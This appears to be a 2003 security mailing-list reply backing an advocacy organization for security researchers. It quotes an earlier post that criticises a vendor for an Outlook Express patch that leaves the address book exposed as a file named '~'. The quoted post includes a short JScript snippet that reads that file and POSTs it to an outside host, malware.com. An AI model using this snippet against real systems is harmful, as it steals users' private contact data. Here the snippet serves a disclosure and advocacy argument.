Re: Security researchers organization

[John C Borkowski III <borkowsj () spawar navy mil>]

I would like to see an organization that would do exactly that:

> promote and protect the interests of security researchers

Something that at least in the United States, would act as a voice to
the government to counter the claims of vendors. An "advocacy group", as
it were. Probably with lobbyists to do the congressional work required
to make out voices heard.

Almost every group of like minded people and professionals has such an
organization. An we researchers, with potentially so much to loose, have
no such voice.

I think the time has come to start one.

- jcb3



On Tue, 2003-11-18 at 14:30, http-equiv () excite com wrote:
> <!-- 
>
> What I would like to see
> created is an organization that would promote and protect the interests
> of security researchers, plain and simple. There is currently no
> organization that exists solely to guide, help and represent security
> researchers on a larger scale, yet we can all recognize the need.
>
>  -->
>
> I don't think those capable of actually doing research require hand holding by anyone.
>
>
> <!-- 
>
> We are a wide, international and differing group of researchers, some
> with malicious and others with altruistic intents for finding security
> vulnerabilities. Despite our differences we have much in common - we are
> deeply interested in advancing our knowledge of security and information
> technology, we find vulnerabilities, we want the vendor to know about
> these at some point in time and we want to be accredited for our
> findings.
>
>  -->
>
> Can this not already be achieved by following the minimum requirement of any one particular vendor. Or following any 
> one of the number of so-called disclosure guidelines already tabled.
>
> While some may want accreditation and pat on the back, others may want the continual flow of effluent onto the 
> internet to cease. Some want habitual offenders penalised. Monetarily. Some want an authoritative body like a UL or 
> CSA or VDE or SEMKO or BS to stamp their mark on product entering the internet. 'REJECTED' for junk product that 
> finds it's way repeatedly onto the internet.
>
> Allow me to give you an example of a habitual offender:
>
> There is a peculiar file that appears on almost everyone's computers since April of 2003. Peculiar enough in that all 
> it is, is a tilde "~". Inside that file is the entire contents of the user's address book. In fact, the file is 
> exactly that. The user's address book. Simply adding the extension of  *.wab to it, opens up none other than the 
> Windows Address Book. All names, addresses and whatever critically private information one puts in there. Some people 
> even put their banking and credit card details in there believe it or not.
>
> This peculiar little file is an oddity created by the April 2003, Cumulative Patch for Outlook Express (330994). Now 
> seven months ago. A most useful file in that it is created in a number of well known places including "C:\". Knowing 
> the file name and location makes it quite easy to 'steal' this file and  invade the privacy of the user of the 
> computer where it still resides today. Some seven months after the vendor knowing full well about it.  [I believe 
> there is a pending lawsuit against the same vendor along the same lines at this time]. 
>
> You see:
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET", "file:///C:/~",0);
> x.Send();
> var y = new ActiveXObject ("Microsoft.XMLHTTP");
> y.Open("POST", "http://www.malware.com/forthetaking.php";, false);
> y.Send(x.responseBody);
>
> Will get and post that file. With a little bit of effort and timing, all one needs to do is steal that file and 
> invade the privacy of the "customer" ! And who's fault will that be? Mine for providing this glaringly obvious 
> scenario 'for free' or the vendor sitting on their hands for seven months thinking about it for a fee.
>
> REJECT !  the product and keep it off the internet !